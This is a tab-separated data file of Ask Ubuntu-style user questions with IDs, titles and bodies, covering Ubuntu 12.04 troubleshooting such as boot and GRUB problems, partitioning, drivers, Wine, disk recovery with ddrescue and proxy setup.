194833	how to publish free closed source application on ubuntu softvare center	i want to publish application , i do n't want to sell my app but also i do n't want to show my source code . am i able to publish this application on ubuntu softvare center .
194840	how to drag from a background window to the front window	is the following i will explain possible with a key combination ? here is the image : as you can see , the terminal is the focus window ( front window ) and nautilus is in the background ( back window ) . how can i grab a folder or file from nautilus without loosing focus on the terminal ( without making the terminal go to the background and nautilus to the front ) and drop it in the terminal ? . what i want is not to have to alt+tab again just to do this . options like resizing the windows to fit the screen are not what i am looking for . like in the image , we have a fullscreen window that we want it to stay like that . we can drag the terminal window around but anytime i access the background nautilus window , i should not loose focus on the terminal ( it should not go to the background every time i access nautilus ) . maybe like a key combination that freezes the current focus windows positions and i can drag from background windows to background windows or background windows to the front focused one .
194843	rear speakers and subwoofers not working in ubuntu 12.04 on hp dv6	i have an hp dv6-6154tx laptop and i recently installed ubuntu 12.04 with dual boot on it . the problem is only two of my speakers are working and the sub-woofers also are not working . the result is extremely quiet sound from my laptop . please help .
194846	gparted : creating a new logical partition	i have ubuntu 12.04 lts and windows 7 on my computer . i would create a new logical partition , and when i run sudo fdisk -l i get : dispositivo boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 1518526463 759159808 7 hpfs/ntfs/exfat /dev/sda3 1910609920 1953521663 21455872 7 hpfs/ntfs/exfat /dev/sda4 1585090560 1905090559 160000000 83 linux so i have sda1 , the windows 7 boot partition , sda2 , the windows 7 sys partition , sda3 , the windows recovery environment and finally sda4 , the ubuntu partition . i have 31.74 gb of not allocated space , but when i try to create a new ( logical ) partition , it says that i can make only 4 primary partitions . i know , but all my primary partitions are important for me , and i ca n't swap off no one of these . how can i create a new logical partition without removing any other partition ? sorry for my terrible english , and thank you in advance . p.s . : i have no linux-swap partition .
194850	can i trust the updates offered in the update manager ?	is it wise to trust the system as far as accepting and installing updates that appear in the update manager ? after i updated to kernel 3.4 it now reports about 850 updates at about 400mb , which would take all day on a usb tethered connection .
194853	how to connect to internet via dsl modem over usb interface ?	i have installed ubuntu 12.04 lts on my machine . please tell me how to connect to internet using zte zxdsl 831 aii modem via usb ( not ethernet ) as my ethernet port of modem is damaged .
194859	playonlinux / wine error . can not add games to list	i am new to the linux platform as a whole . now , that 's not to say that i have n't been watching countless videos and articles of linux before i made the switch . i have gone through multiple tutorials but i just ca n't seem to install games that are not listed within playonlinux . it just simply does n't show the game in the list . i have killing floor installed on steam ( which is on pol ) but can not seem to add killing floor to the list in playonlinux . i can launch killing floor from steam but there is no audio and it is slightly laggy . any help - relative to the above issue or not - is much appreciated . thank you .
194861	wine right click open is different to terminal `` wine appname ''	i have an application ( star trek bridge commander ) which runs fine on wine when i navigate to its directory and 'open with - > wine windows program loader ' from the right click menu . unfortunately , it quits with a runtime error if i try to use 'wine ( path ) ' or 'wine start ( path ) ' in the terminal . this is a problem because i am trying to make a custom shortcut ( .desktop file ) to open it . thankyou for any assistance : )
194863	fonts.conf - use droid fonts where possible	i want where possible droid fonts to be used . so i created ~/.fonts.conf with this content : < ? xml version='1.0 ' ? > < ! doctype fontconfig system 'fonts.dtd ' > < fontconfig > < alias > < family > serif < /family > < prefer > < family > droid < /family > < /prefer > < /alias > < alias > < family > sans-serif < /family > < prefer > < family > droid < /family > < /prefer > < /alias > < alias > < family > sans < /family > < prefer > < family > droid < /family > < /prefer > < /alias > < alias > < family > monospace < /family > < prefer > < family > liberation < /family > < /prefer > < /alias > < match target= '' font '' > < edit mode= '' assign '' name= '' rgba '' > < const > none < /const > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' hinting '' > < bool > true < /bool > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' hintstyle '' > < const > hintmedium < /const > < /edit > < /match > < dir > ~/.fonts < /dir > < match target= '' font '' > < edit mode= '' assign '' name= '' antialias '' > < bool > true < /bool > < /edit > < /match > < /fontconfig > but i get this in the console : vic @ wic : ~/documents $ fc-match sans fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . dejavusans.ttf : `` dejavu sans '' `` book '' i tried restarting computer , but i get the same result . how do i force ubuntu to use droid fonts where possible ?
194866	ubuntu 9.04 update to the newest version	i have the ubuntu version 9.04 on my pc installed , but i can`t update it with the manager . i have tried to install the version 12.04 ( 64-bit ) but i get a black screen when i click on the install button . i would like to make a dual-boot . my pc has the following specs : intel quad q9550 ; 8gb ram ; nvidia gtx 550ti how i can update the version 9.04 or how i can install the version 12.04 without the blackscreen ?
194868	no grub menu after bios update 12.04	i updated my bios while in windows . after that the machine wo n't boot . gives me grub-rescue > prompt . tried boot-repair and advanced options but it did not work . the only thing that worked was mbr option . my windows is on sdb2 and ubuntu on sdb3 . i have an sda disk as well . i restored mbr of sdb . my grub was originally set to windows as a default os . that 's where it now goes , no matter whether sda or sdb mbr is restored . grub.cfg shows 30 seconds time delay ; but the grub menu never displays . so the only way i can get into ubuntu is by booting to live cd and choosing to boot an existing ubuntu installation . my boot config is posted at here . will appreciate your help in restoring grub menu if possible .
194874	ubuntu 12.04 wo n't boot , only shows a blinking white line	i am trying to turn on my computer ( dell mini 910 netbook ) and after the bios setup screen it just shows a blinking white line . please help !
194876	i ca n't see applications under file	in top left in file menu there suppose to be application but it 's not there , everytime i have use dash to use my installed programs .
194883	how do you clean up your grub 2 boot menu ?	when my computer initially boots up it lists about 8 different options . how can i clean this up to limit my selection to only one , the current installation ? at one time i was able to clean these up via synaptic package manager but now when i type in the version number ( ex . 2.6.35-25 ) for spm to locate i ca n't find them to delete . is there another way to do this ?
194885	permissions problem installing python 2.5.4 from source	i was trying to install python 2.5.4 to my ubuntu 12.04 lts i downloaded the package from their website python 2.5.4 release and i did everything they told me to , but when trying to `` execute '' the command : make install i get the following error message : /usr/bin/install -c python /usr/local/bin/python2.5 /usr/bin/install : can not create regular file `/usr/local/bin/python2.5 ' : permiss ion denied make : *** [ altbininstall ] error 1 help will be much appreciated .
194887	i have installed ubuntu 12.04.1 lts on an external drive from a cd but it will not boot . imac 2011 , osx 10.7.4	i have followed all installation instructions and partitioned the drive as follows : 475 gb for ubuntu and its files 25 gb of swap space 5 mb of reserved bios boot space i attempted placing the bootloader in the bios boot space , in the ubuntu partition , and on the drive itself - none worked . when i tried to boot ubuntu , it said that the drive was not bootable and asked for a boot disk . when i put one in , it gave the default screen asking if i wanted to try ubuntu or install . did i do anything wrong ? any help is much appreciated ; i 'm getting really tired of osx and love the look and feel of ubuntu ... -edit- i have installed and am using refind and i can use super grub 2 from a disk , but neither recognizes ubuntu as a bootable os . i tried following the instructions here : https : //help.ubuntu.com/community/ubuntupreciseon2011imac and am stuck where it says '' select somethind like 'detect even if the mbr is overwritten ' , select the only entry which will appear and boot ubuntu normaly , but just due to super grub disk 2 . '' because grub reports that there is nothing there . ( i will boot with grub loaded in the drive , and select it at the screen where you can boot osx , windows ( mislabeled , it 's actually the ubuntu installation on my second drive ) and my grub cd . i will then select the option to find previous grub installations as prompted by the website , and that 's where i will get the error . grub also fails to find ubuntu with it 's list all oses option . )
194891	can not run program - 'org.gnome.desktop.interface ' is not installed	i am trying to make a python app that basically views a web page with quickly on ubuntu 12.04 . when i do sudo quickly run in terminal , i always get this error : ( saikoroubuntu:5283 ) : glib-gio-error ** : settings schema 'org.gnome.desktop.interface ' is not installed what seems to be the issue ? here is my code : # ! /usr/bin/env python import gtk import sys from pyqt4.qtcore import * from pyqt4.qtgui import * from pyqt4.qtwebkit import * app = qapplication ( sys.argv ) web = qwebview ( ) web.load ( qurl ( `` http : //shifat.tk/apps/saikoro/ios '' ) ) web.show ( ) sys.exit ( app.exec_ ( ) ) i 'm basically using the code i found on stackoverflow : `` how to make a simple cross-platform webbrowser with python ? ''
194898	reset cdma usb modem without unplug/replug	i have ce682 usb modem connected using wvdial . every time it got disconnected , i cant reconnect without unplug and replug . if i execute wvdial without replug , it will only throw meaningless junk in the terminal as shown here : how do i reset the usb modem without having to unplug each time it got disconnected ?
194899	how do i restore the original color scheme , icons , and theme ?	i 'd like the original colour scheme , icon style of 12.04 . i somehow lost the ambiance theme ( possible error or upgrade error ) . i re-installed 'light-themes ' from the terminal and got it back . but the panel on the top that shows the options of sound , battery and wi-fi has changed and i can-not get the original setting back . in the windows , the close , minimize tools have shifted to the right instead of the original left side . i had installed myunity and ubuntu tweak but deleted them . as such , i want the original setting back . kindly help me with the commands . i have searched for solutions ; there are multiple and i need to be sure if i should follow the same . kindly bear before marking duplicate . discoveries : the appearance is gray and boxy as outlined here . not sure same problem . similar 'gray and boxy ' article here . desktop forgets theme . i have also tried the unity -- reset command . it never completes . i gave it 20 minutes .
194914	ubuntu 12.04 wo n't boot ?	i just replaced windows with ubuntu 12.04 . it installed correctly , but but when i tried to restart the computer to run of the hdd instead of my usb , the os did n't boot . a message came up on my monitor saying `` change resolution to 1920x1080 - 60hz '' . can anybody help ? i am very inexperienced with this .
194915	12.04 sandybridge cpu high heat	my 2500k sandybridge cpu seems to hover around 75-80c when doing light web browsing . is this a problem in the kernel for 12.04 ( and is there a fix/workaround for it ? ) or should i look into a better cooler and thermal paste ?
194918	can i use hud menu for unfocused applications ?	example : if i am running libreoffice writer on one desktop and audacious on another , can i train or alter the unity hud alt command to allow me access to menu items in audacious even as writer is the focused window ? i did a little looking around , but i 'm stumped . fuzzy matching seems simply to allow access to focused windows at any given point , unless no windows are focused . thanks !
194924	xbox 360 controller problems	hello everyone another new linux user here.most things are going well except for the 360 controller.there are so many posts about this it gets a little confusing on which to follow.anyways someone told me that ubuntu 12.04 comes with a 360 wireless receiver and its just plug and play.when i plug my receiver in and run jstest-gtk 4 generic xbox pad come up in the joystick preferences window.now the controller itself isnt even on , and when it is on it doesnt sync.all four lights just flash.what am i doing incorrectly ? before it is asked yes this controller & receiver both work in windows 7
194925	apt : ureadahead will be reprofiled on next reboot	i typed this command to remove a package and related configuration files : sudo apt-get -- purge remove supervisor the command ended without errors but i got this message : ureadahead will be reprofiled on next reboot what does it mean ? do i have ( or is it suggested ) to reboot ?
194930	why does gwibber show a security warning when i try to authenticate my facebook account ?	when i try to authorize in the end , it shows : success security warning : the above url is not not valid for a cash card or gift card . giving away the url may result in your account being hijacked . and gwibber does n't connect to facebook .
194933	what do these hard disk errors `` test wp failed , assume write enabled '' mean ?	what do these errors mean ? sep 30 23:52:29 ubuntu kernel : [ 1649.816032 ] [ hardware error ] : machine check events logged sep 30 23:52:37 ubuntu kernel : [ 1657.885240 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 30 23:52:37 ubuntu kernel : [ 1657.887489 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 30 23:52:37 ubuntu kernel : [ 1657.887495 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 30 23:53:29 ubuntu kernel : [ 1709.597129 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 30 23:53:29 ubuntu kernel : [ 1709.599380 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 30 23:53:29 ubuntu kernel : [ 1709.599385 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 30 23:54:21 ubuntu kernel : [ 1761.309135 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 30 23:54:21 ubuntu kernel : [ 1761.311386 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 30 23:54:21 ubuntu kernel : [ 1761.311391 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 30 23:55:04 ubuntu aptdaemon : info : quitting due to inactivity sep 30 23:55:04 ubuntu aptdaemon : info : quitting was requested sep 30 23:55:04 ubuntu dbus [ 881 ] : [ system ] activating service name='org.debian.apt ' ( using servicehelper ) sep 30 23:55:05 ubuntu aptdaemon : info : initializing daemon sep 30 23:55:05 ubuntu dbus [ 881 ] : [ system ] successfully activated service 'org.debian.apt' sep 30 23:55:05 ubuntu aptdaemon.packagekit : info : initializing packagekit compat layer sep 30 23:55:12 ubuntu kernel : [ 1813.021139 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 30 23:55:12 ubuntu kernel : [ 1813.023394 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 30 23:55:12 ubuntu kernel : [ 1813.023399 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 30 23:56:04 ubuntu kernel : [ 1864.737157 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 30 23:56:04 ubuntu kernel : [ 1864.739403 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 30 23:56:04 ubuntu kernel : [ 1864.739408 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 30 23:56:56 ubuntu kernel : [ 1916.453416 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 30 23:56:56 ubuntu kernel : [ 1916.455780 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 30 23:56:56 ubuntu kernel : [ 1916.455786 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 30 23:57:47 ubuntu kernel : [ 1968.157063 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 30 23:57:47 ubuntu kernel : [ 1968.159297 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 30 23:57:47 ubuntu kernel : [ 1968.159303 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 30 23:58:39 ubuntu kernel : [ 2019.869064 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 30 23:58:39 ubuntu kernel : [ 2019.871307 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 30 23:58:39 ubuntu kernel : [ 2019.871312 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 30 23:59:31 ubuntu kernel : [ 2071.581322 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 30 23:59:31 ubuntu kernel : [ 2071.586202 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 30 23:59:31 ubuntu kernel : [ 2071.586208 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 30 23:59:41 ubuntu wpa_supplicant [ 1223 ] : wpa : group rekeying completed with 00:24 : b2 : dd : cb:42 [ gtk=ccmp ] oct 1 00:00:05 ubuntu aptdaemon : info : quitting due to inactivity oct 1 00:00:05 ubuntu aptdaemon : info : quitting was requested oct 1 00:00:05 ubuntu dbus [ 881 ] : [ system ] activating service name='org.debian.apt ' ( using servicehelper ) oct 1 00:00:06 ubuntu aptdaemon : info : initializing daemon oct 1 00:00:06 ubuntu dbus [ 881 ] : [ system ] successfully activated service 'org.debian.apt' oct 1 00:00:06 ubuntu aptdaemon.packagekit : info : initializing packagekit compat layer oct 1 00:00:23 ubuntu kernel : [ 2123.293360 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled oct 1 00:00:23 ubuntu kernel : [ 2123.295625 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed oct 1 00:00:23 ubuntu kernel : [ 2123.295630 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through
194934	enabling pae in ubuntu 12.04 on asus eee pc 1025c	i have a eee pc 1025c which came pre-loaded with windows 7 starter edition . i installed ubuntu 12.04 32-bit as dual-boot with no difficulties . an output of uname -r gave an output of 3.4.0-030400-generic . a few weeks later , i installed a 4gb stick of ram instead . i installed the pae files using apt-get ( linux-generic-pae and linux-headers-generic-pae ) . i also verified that the processor is pae-capable by checking /proc/cpuinfo . however , the system still is not pae-enabled ( same output of uname as before ) . when i check my total memory using free -m , it says 3019 , but bios tells me that all 4gb are there on the boot screen . what am i missing ?
194936	how do i turn ubuntu 12.04 server into an open socks5 proxy ?	i 'd like to set up a socks5 proxy based on my ubuntu 12.04 server . i 've read that this is supposed to be easy and doable with one command : ssh -f -n -d 0.0.0.0:1080 localhost not so much in my case ( error message ) : permission denied ( publickey ) . after this , i 've tried installing ss5 . first from source : wget http : //heanet.dl.sourceforge.net/project/ss5/ss5/3.8.9-7/ss5-3.8.9-7.tar.gz tar -zxvf *.tar.gz cd * ./configure which ended in configure : error : *** some of the headers were n't found *** after which i attempted to install it from rpm , without much luck : error : failed build dependencies : openldap-devel is needed by ss5-3.8.9-6.i386 pam-devel is needed by ss5-3.8.9-6.i386 openssl-devel is needed by ss5-3.8.9-6.i386 libgssapi-devel is needed by ss5-3.8.9-6.i386 ... . reading package lists ... done building dependency tree reading state information ... done e : unable to locate package openldap-devel there are other packages for socks5 , but i 've met similar problems with them too . can anyone point me to a good info on how to turn ubuntu 12.04 server into a socks5 proxy ?
194939	xbmc reads only 994 movies out of 1024	i have 1024 movies but xbmc only shows 994 . in what file can i find information about which movies were not correctly read so i can check for format , coder and other video details . all movies for what i can see i have 4 container formats : 606 movies in avi , 3 in m4a , 105 in mkv and 310 mp4 .
194946	ubuntu software center stuck in applying/canceling/searcing	i ca n't install anything from software center because it is stuck at applying/searching , when i cancel it , it is stuck at canceling . then software center gives me a pop up box that it needs to be repaired , so i click `` repair '' but in the progress of `` repairing installed software '' it is stuck at applying changes . can somebody please help me ?
194948	caught segmentation error , dumping stack , cause ?	i am receiving this error periodically ( and the daemon crashes ) when running lots of rtorrent daemons with lots of files , could someone please tell me what is causing this and how to fix it ? rtorrent has quite a few tickets with the same errors on high load machines , however they seem to keep closing the tickets as `` invalid '' : ( i am using ubuntu 12.04 : caught segmentation fault , dumping stack : 0 rtorrent ( ) [ 0x411d15 ] 1 rtorrent ( ) [ 0x443260 ] 2 /lib/x86_64-linux-gnu/libc.so.6 ( +0x364c0 ) [ 0x7f9cc4f404c0 ] 3 /usr/lib/libtorrent.so.14 ( _zn7torrent9pollepoll7performev+0xd4 ) [ 0x7f9cc6127fc4 ] 4 rtorrent ( ) [ 0x443ee0 ] 5 /lib/x86_64-linux-gnu/libpthread.so.0 ( +0x7e9a ) [ 0x7f9cc683ae9a ] 6 /lib/x86_64-linux-gnu/libc.so.6 ( clone+0x6d ) [ 0x7f9cc4ffc4bd ] aborted i think it could be related to the number of available file descriptors or the available ram , however both seem to be in good shape , root @ sb7 : ~ # free -mt total used free shared buffers cached mem : 24164 24041 122 0 137 22033 -/+ buffers/cache : 1870 22293 swap : 29998 689 29309 total : 54163 24731 29431 i am not entirely sure how to find out how many open file descriptors i have , ulimits and other commands keep giving me different results d : varies between 1024 and 2.5 million other possible cause : iowait is quite high i think ? : avg-cpu : % user % nice % system % iowait % steal % idle 1.05 0.00 2.64 18.10 0.00 78.21 device : tps mb_read/s mb_wrtn/s mb_read mb_wrtn sda 246.89 9.54 1.49 22562358 3525678 sdb 67.92 4.34 1.53 10273673 3615723
194949	tv out is not 16.9 only 4.3	i have intel gma 945 and when i tried to change the resolution to 1024x600 ( 16.9 ) it comes with error . note : at the moment it 's setted on 800x600 ( 4.3 ) , which gives you black borders and it 's not full widescreen .
194950	dma not enabled on old hardware	while working on an old hardware where ubuntu is installed i noticed using top that a huge amount of cpu time was spent waiting for io operations ( network data transfer was in progress ) . i therefore checked for dma state using this command : sudo hdparm -d /dev/sdb2 /dev/sdb2 : hdio_get_dma failed : inappropriate ioctl for device does this mean the device is not using dma ? i also tried to retrieve information about the hardware and got this : sudo hdparm -i /dev/sdb2 /dev/sdb2 : ata device , with non-removable media model number : wdc wd1600jb-00gva0 serial number : wd-wcal91665091 firmware revision : 08.02d08 standards : supported : 6 5 4 likely used : 8 configuration : logical max current cylinders 4092 65535 heads 16 1 sectors/track 63 63 -- chs current addressable sectors : 4128705 lba user addressable sectors : 66055248 lba48 user addressable sectors : 312581808 logical/physical sector size : 512 bytes device size with m = 1024*1024 : 152627 mbytes device size with m = 1000*1000 : 160041 mbytes ( 160 gb ) cache/buffer size = 8192 kbytes ( type=dualportcache ) capabilities : lba , iordy ( can be disabled ) standby timer values : spec 'd by standard , with device specific minimum r/w multiple sector transfer : max = 16 current = 16 recommended acoustic management value : 128 , current value : 254 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 *udma5 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache * look-ahead * host protected area feature set * write_buffer command * read_buffer command * download_microcode set_max security extension automatic acoustic management feature set * 48-bit address feature set * device configuration overlay feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * smart command transport ( sct ) feature set * sct long sector access ( ac1 ) * sct lba segment access ( ac2 ) * sct error recovery control ( ac3 ) * sct features control ( ac4 ) * sct data tables ( ac5 ) security : supported not enabled not locked not frozen not expired : security count not supported : enhanced erase hw reset results : cblid- above vih device num = 1 determined by the jumper checksum : correct it is my understanding from this that dma should be supported . why am i getting that error and is it unusual that top shows values higher than 90 % for `` iowait '' operations when two network transfers are running ?
194952	why is the `` apt '' command not found ?	sudo : apt : command not found what does this error mean ? the apt command is not working , and i 've lost the software center .
194957	how to convert winword files to open in gedit ?	i finally installed ubuntu in my desktop , but now , when i open winword files with the text editor , it opens but all the formatting is off . how can i open the file properly ?
194960	dell vostro 3560 webcam ubuntu 12.04	i have a dell vostro 3560 notebook and its webcam is not recognized by ubuntu 12.04 my lsusb output is : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 138a:0011 validity sensors , inc. vfs5011 fingerprint reader bus 001 device 004 : id 0bda:0129 realtek semiconductor corp . bus 001 device 005 : id 0c45:648b microdia bus 002 device 003 : id 0cf3 : e004 atheros communications , inc. could anyone help me ?
194962	mounting ddrescue image after recovery ( in over my head )	i 'm having problems mounting the recovery image . i 've tried to mount the image multiple ways . quark @ ds9 ~ $ sudo mount -t ext4 /media/jump1/1recover/sdb1.img /mnt mount : wrong fs type , bad option , bad superblock on /dev/loop0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so quark @ ds9 ~ $ sudo mount -r -o loop /media/jump1/1recover/sdb1.img recover mount : you must specify the filesystem type quark @ ds9 ~ $ sudo mount /media/jump1/1recover/sdb1.img mnt mount : you must specify the filesystem type it does n't even give me detailed information on the file i just made , nautilus says it 's 160gb . quark @ ds9 ~ $ file /media/jump1/1recover/sdb1.img /media/jump1/1recover/sdb1.img : data quark @ ds9 ~ $ mmls /media/jump1/1recover/sdb1.img can not determine partition type i 'm not sure what i 'm doing wrong or if i started this process incorrectly from the beginning . i 've outlined what i 've done so far below . i 'm clueless , i 'd appreciate if someone had some input for me . what i have done from the beginning my laptop has two hard drives . one has the dual boot win7 / linux mint system files . secondary one contained my /home folder . the laptop was jarred and the /home disk was broken . i tried a livecd recovery , it failed . would n't even load a live session with the disk installed . so i turned to ddrescue . quark @ ds9 ~ $ sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009fc18 device boot start end blocks id system /dev/sda1 * 2048 112642047 56320000 7 hpfs/ntfs/exfat /dev/sda2 138033152 312580095 87273472 83 linux /dev/sda3 112644094 138033151 12694529 5 extended /dev/sda5 112644096 132173823 9764864 83 linux /dev/sda6 132175872 138033151 2928640 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002a8ea device boot start end blocks id system /dev/sdb1 * 63 312576704 156288321 83 linux disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xed6d054b device boot start end blocks id system /dev/sdc1 63 1953520064 976760001 7 hpfs/ntfs/exfat sda - 160g internal , holds all system files and all computer functions . sdb - 160g internal , broken , contains about 140g of data i 'd like to recover . sdc - 1t external , contains recovery image . only place that has space to do all this . from this site , https : //apps.education.ucsb.edu/wiki/ddrescue i used this script to create an image of the broken hard drive . i changed the destination to the external usb drive . # ! /bin/sh prt=sdb1 src=/dev/ $ prt dst=/media/jump1/1recover/ $ prt.img log= $ dst.log sudo time ddrescue -- no-split $ src $ dst $ log sudo time ddrescue -- direct -- max-retries=3 $ src $ dst $ log sudo time ddrescue -- direct -- retrim -- max-retries=3 $ src $ dst $ log everything looked like it came off without a hitch : quark @ ds9 ~ $ sudo bash recover1 press ctrl-c to interrupt initial status ( read from logfile ) rescued : 0 b , errsize : 0 b , errors : 0 current status rescued : 160039 mb , errsize : 4096 b , current rate : 35588 b/s ipos : 3584 b , errors : 1 , average rate : 22859 kb/s opos : 3584 b , time from last successful read : 0 s finished 12.78user 1060.42system 1:56:41elapsed 15 % cpu ( 0avgtext+0avgdata 4944maxresident ) k 312580958inputs+0outputs ( 1major+601minor ) pagefaults 0swaps press ctrl-c to interrupt initial status ( read from logfile ) rescued : 160039 mb , errsize : 4096 b , errors : 1 current status rescued : 160039 mb , errsize : 1024 b , current rate : 0 b/s ipos : 1536 b , errors : 1 , average rate : 13 b/s opos : 1536 b , time from last successful read : 1.3 m finished 0.00user 0.00system 3:43.95elapsed 0 % cpu ( 0avgtext+0avgdata 4944maxresident ) k 238inputs+0outputs ( 3major+374minor ) pagefaults 0swaps press ctrl-c to interrupt initial status ( read from logfile ) rescued : 160039 mb , errsize : 1024 b , errors : 1 current status rescued : 160039 mb , errsize : 1024 b , current rate : 0 b/s ipos : 1536 b , errors : 1 , average rate : 0 b/s opos : 1536 b , time from last successful read : 3.7 m finished 0.00user 0.00system 3:43.56elapsed 0 % cpu ( 0avgtext+0avgdata 4944maxresident ) k 8inputs+0outputs ( 0major+376minor ) pagefaults 0swaps it looks like , from where i 'm standing it worked perfectly . here 's the log : # rescue logfile . created by gnu ddrescue version 1.14 # command line : ddrescue -- direct -- retrim -- max-retries=3 /dev/sdb1 /media/jump1/1recover/sdb1.img /media/jump1/1recover/sdb1.img.log # current_pos current_status 0x00000600 + # pos size status 0x00000000 0x00000400 + 0x00000400 0x00000400 - 0x00000800 0x254314fc00 + i 'm not sure how to proceed . does this mean all of my data is lost ? ? ? ? ? ? ? ? appreciate any input !
194963	external usb hard-drive changing drive letter	i have a seagate freeagent go external usb hard drive that was mounted but mysteriously decided to reconnect itself : sep 30 15:07:06 feinman kernel : [ 243901.551604 ] usb 1-1.2 : usb disconnect , device number 3 sep 30 15:07:06 feinman kernel : [ 243901.553828 ] sd 6:0:0:0 : [ sdb ] synchronizing scsi cache sep 30 15:07:06 feinman kernel : [ 243901.553893 ] sd 6:0:0:0 : [ sdb ] result : hostbyte=did_no_connect driverbyte=driver_ok sep 30 15:07:10 feinman kernel : [ 243905.336557 ] usb 1-1.2 : new high-speed usb device number 4 using ehci_hcd sep 30 15:07:10 feinman kernel : [ 243905.431219 ] scsi7 : usb-storage 1-1.2:1.0 sep 30 15:07:11 feinman kernel : [ 243906.427207 ] scsi 7:0:0:0 : direct-access seagate freeagent go 0148 pq : 0 ansi : 4 sep 30 15:07:11 feinman kernel : [ 243906.428303 ] sd 7:0:0:0 : attached scsi generic sg1 type 0 sep 30 15:07:11 feinman kernel : [ 243906.430317 ] sd 7:0:0:0 : [ sdc ] 625142447 512-byte logical blocks : ( 320 gb/298 gib ) sep 30 15:07:11 feinman kernel : [ 243906.430860 ] sd 7:0:0:0 : [ sdc ] write protect is off sep 30 15:07:11 feinman kernel : [ 243906.430865 ] sd 7:0:0:0 : [ sdc ] mode sense : 1c 00 00 00 sep 30 15:07:11 feinman kernel : [ 243906.431386 ] sd 7:0:0:0 : [ sdc ] write cache : enabled , read cache : enabled , does n't support dpo or fua sep 30 15:07:11 feinman kernel : [ 243906.493674 ] sdc : sdc1 sep 30 15:07:11 feinman kernel : [ 243906.496109 ] sd 7:0:0:0 : [ sdc ] attached scsi disk it changed from sdb to sdc , causing a number of problems for me . what can i do to further track down the cause ? i thought it might be a problem with it sleeping but when i cat /sys/class/scsi_disk/6\:0\:0\:0/allow_restart , i see that it 's already 1 .
194964	i keep losing connectivity with an rtl8723e wireless card ( 12.04 )	i have a realtek rtl8723e network card . it connects for about 3 minutes , but then suddenly disconnects and then reconnects after about a minute . this really hinders my ability to use ubuntu , as i want to learn to use it but without the internet it is basically pointless . i know it 's the correct driver , but maybe there is some package that magically fixes problems like this . a man can dream . also , it is n't the router settings . thanks .
194968	remote desktop connection from windows 7 to ubuntu	i am new to ubuntu - i have my personal laptop on ubuntu and work on win 7 pc at my office . can you please tell me how to do a desktop connection to my home laptop from office ? i have a wireless router at home and the laptop connects to internet through the router . please let me know of a solution .
194969	enabling hibernate in 12.04 stops reboot and shutdown	i enabled hibernate by setting the policy in /var/lib/ ... /10-vendor.d . once i set this field , i was able to hibernate jolly well again , but then the reboot and shutdown went to fast reboot mode and started showing the login screen bypassing the grub loading . i do n't have kexec-tools installed and unable to figure out how to get rid of the fast reboot .
